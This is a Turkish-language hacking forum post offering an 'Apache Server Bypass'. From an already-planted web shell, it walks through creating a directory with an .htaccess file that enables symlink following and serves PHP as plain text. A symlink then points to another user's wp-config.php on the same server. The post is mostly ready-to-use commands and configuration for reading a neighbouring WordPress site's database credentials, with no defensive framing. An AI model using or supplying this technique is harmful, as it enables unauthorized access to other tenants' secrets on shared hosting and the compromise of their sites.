Apache Server Bypass (1 Viewer)

Durden 

existence is not real.
Joined
Apr 26, 2020
Credits
1,735
Rating - 100%
Öncelikle shellimizdeki komut satırına (execute) yerine mkdir diamonds yazıyoruz ve diamonds adında dosyamız oluşuyor.

cd diamonds diyerek açtığımız dosyanın içerisine giriyoruz ve .htaccess dosyasi oluşturuyoruz.

Ve .htaccess dosyasinin içerisine şu kodları yaziyoruz :

Code:
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
Options All
ReadmeName diamonds.txt

Yazıyoruz ve dosyayı kaydediyoruz.

En son olarak

ln -s /home/wordpress_site_user/public_html/wp-config.php diamonds.txt

Diyerek bypasslayabiliriz.
 

Users who are viewing this thread

Top